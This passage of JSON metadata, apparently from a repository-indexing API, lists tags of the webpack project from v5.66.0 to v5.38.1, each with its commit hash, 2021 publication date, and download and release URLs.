manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b